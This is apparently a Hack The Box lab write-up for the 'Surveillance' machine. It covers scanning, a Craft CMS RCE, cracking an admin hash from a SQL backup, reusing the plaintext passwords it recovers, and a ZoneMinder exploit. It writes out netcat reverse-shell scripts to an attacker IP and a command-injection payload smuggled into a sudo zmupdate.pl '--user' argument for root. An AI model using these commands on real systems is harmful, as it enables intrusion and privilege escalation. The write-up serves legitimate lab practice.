PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA) |_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://surveillance.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
echo "10.129.230.42 surveillance.htb" >> /etc/hosts
it’s craft CMS4.4.14
start googling
Find a new RCE vulnerability corresponding to the CMS version
CVE-2023-41892
finally find a Poc here:
script /dev/null -c /bin/bash CTRL + Z stty raw -echo; fg Then press Enter twice, and then enter: export TERM=xterm
improve shell interaction
enumerate folders
www-data@surveillance:~/html/craft/storage/backups$ ls surveillance--2023-10-17-202801--v4.4.14.sql surveillance--2023-10-17-202801--v4.4.14.sql.zip 7-202801--v4.4.14.sql:~/html/craft/storage/backups$ file surveillance--2023-10-17 surveillance--2023-10-17-202801--v4.4.14.sql: ASCII text
noticed a .sql file, download
i found a
users
table by keywords search, then i trace back to the insert
command in the .sql file, it turns out:search for ‘INSERT INTO
user
’ then i getNSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46'); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; commit;
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
seems a hashcheck the users name inside /etc/passwd file, i found a user named “matthew”
i got the credential by online cracking the hashes obtained from .sql file
To see if i can switch to user “matthew”
ssh matthew@surveillance.htb starcraft122490
successfully switched to matthew!
SUID and sudo -l
local ports, no password for mysql.
check version
matthew@surveillance:~$ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.3 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.3 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy
googling for this version PE exploit, because i remember this version is vulnerable.
CVE-2023-2640-CVE-2023-32629
g1vi • Updated Aug 6, 2024
try this, but seems not work
try linpeas to enumerate
╔══════════╣ Analyzing Backup Manager Files (limit 70) -rw-r--r-- 1 root zoneminder 5265 Nov 18 2022 /usr/share/zoneminder/www/ajax/modals/storage.php -rw-r--r-- 1 root zoneminder 1249 Nov 18 2022 /usr/share/zoneminder/www/includes/actions/storage.php -rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php 'password' => ZM_DB_PASS, 'database' => ZM_DB_NAME, 'host' => 'localhost', 'password' => 'ZoneMinderPassword2023', 'database' => 'zm', $this->default['host'] = $array[0]; $this->default['host'] = ZM_DB_HOST; -rw-r--r-- 1 root zoneminder 11257 Nov 18 2022 /usr/share/zoneminder/www/includes/database.php
get a credential
ZoneMinderPassword2023
To see what is zoneminder
it is a software for monitoring via closed-circuit
i searched deeply for the port of this software, it was set to 80 as default, but 80 is already occupied by the CMS application, thus 8080 is likely to be the port of zonemineder software.
lets set port forwarding
ssh -L 1234:localhost:8080 matthew@surveillance.htb starcraft122490
use
admin:ZoneMinderPassword2023 admin:admin
failed
cd /usr/share/zoneminder/www/api/app/Config; cat * | grep - version
The version is
1.36.32.1
google searching
git clone https://github.com/rvizx/CVE-2023-26035
exploit, get the shell
create a bind shell , pwn.sh
#!/bin/bash nc 10.10.16.12 8888 -e sh
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/pwn.sh)' --pass=ZoneMinderPassword2023
it not works, change the pwn.sh by using busybox’s nc for bind shell connection
#!/bin/bash busybox nc 10.10.16.12 8888 -e sh
get the root!